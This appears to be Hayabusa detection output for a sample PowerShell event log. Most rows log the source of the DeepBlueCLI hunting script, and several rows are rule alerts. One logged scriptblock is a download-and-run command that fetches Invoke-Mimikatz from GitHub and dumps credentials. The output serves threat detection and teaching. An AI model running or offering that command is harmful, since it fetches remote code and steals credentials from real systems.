{$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. 
# If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:40:20.569 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:40:20.569 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:40:20.569 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:40:20.572 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. 
$groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:40:20.578 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:40:20.581 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} 
""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:40:27.201 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:40:27.201 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:40:27.202 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:40:27.203 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:40:27.734 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:40:49.131 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:40:56.217 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious PowerShell 
Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:12.696 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:14.161 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:28.002 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:37.553 
+09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 01:41:37.559 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" 
Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 